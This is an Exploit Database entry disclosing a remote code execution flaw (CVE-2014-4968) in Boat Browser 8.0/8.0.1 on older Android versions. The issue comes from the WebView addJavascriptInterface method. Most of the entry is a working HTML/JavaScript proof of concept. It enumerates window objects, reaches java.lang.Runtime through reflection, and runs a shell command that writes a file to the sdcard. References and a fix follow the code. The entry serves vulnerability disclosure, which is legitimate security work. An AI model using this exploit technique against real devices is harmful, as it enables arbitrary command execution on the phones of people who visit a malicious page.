Boat Browser 8.0/8.0.1 – Remote Code Execution

• Exploit Database
• 16 阅读

• 作者： c0otlass
  日期： 2014-07-16
• 类别：

  • remote
  平台：

  • android
• 来源：https://www.exploit-db.com/exploits/34088/

• <!--
  													.:: Remote code execution vulnerability in Boat Browser ::.
  
  													
  credit: c0otlass
  social contact: https://twitter.com/c0otlass
  mail: c0otlass@gmail.com
  CVE reserved : 2014-4968
  time of discovery:July 14, 2014
  Browser Official site:http://www.boatmob.com/
  Browser download link:https://play.google.com/store/apps/details?id=com.boatbrowser.free&hl=en
  version Affected : In8.0 and 8.0.1 tested , Android 3.0 through 4.1.x 
  Risk rate: High
  vulnerability Description impact: 
  	The WebView class anduse of the WebView.addJavascriptInterface method has vulnerability which cause remote code in html page run in android device
  	a related issue to CVE-2012-6636
  proof of concept:
  //..............................................poc.hmtl............................................
  -->
  <!DOCTYPE html>
  <html>
  <head>
  <meta charset="UFT-8">
  <title>CreatMalTxt POC - WebView</title>
  <script>
  var obj;
  function TestVulnerability()
  		{
  temp="not";
  var myObject = window;
  	for (var name in myObject) {										
  		if (myObject.hasOwnProperty(name)) {									
  			try
  			{				
  			temp=myObject[name].getClass().forName('java.lang.Runtime').getMethod('getRuntime',null).invoke(null,null);												 
  			}
  			catch(e)
  			{														
  			}
  			}
  	}
  				if(temp=="not")
  						{
  							document.getElementById("log").innerHTML="this browser has been patched";												
  						}
  					else{
  						 document.getElementById("log").innerHTML = "This browser is exploitabale" + "<br>" + " the poc file hase been created in sdcard ...<br>" ;
  						 document.getElementById("log").innerHTML +="we could see proccess information"+ temp.exec(['/system/bin/sh','-c','echo \"mwr\" > /mnt/sdcard/mwr.txt']);																					
  						}
  		}		
  </script>
  </head>
  <body >
  <h3>CreatMalTxt POC</h3>
  <input value="Test Vulnerability"type="button"onclick="TestVulnerability();" />
  <div id="log"></div>
  </body>		
  </html>
  
  <!--
  Solution:
  https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
  http://www.programering.com/a/MDM3YzMwATc.html
  https://www.securecoding.cert.org/confluence/pages/viewpage.action?pageId=129859614		
  
  References: 
  http://blog.trustlook.com/2013/09/04/alert-android-webview-addjavascriptinterface-code-execution-vulnerability/
  https://labs.mwrinfosecurity.com/blog/2012/04/23/adventures-with-android-webviews/
  http://50.56.33.56/blog/?p=314
  https://labs.mwrinfosecurity.com/advisories/2013/09/24/webview-addjavascriptinterface-remote-code-execution/
  https://github.com/mwrlabs/drozer/blob/bcadf5c3fd08c4becf84ed34302a41d7b5e9db63/src/drozer/modules/exploit/mitm/addJavaScriptInterface.py
  -->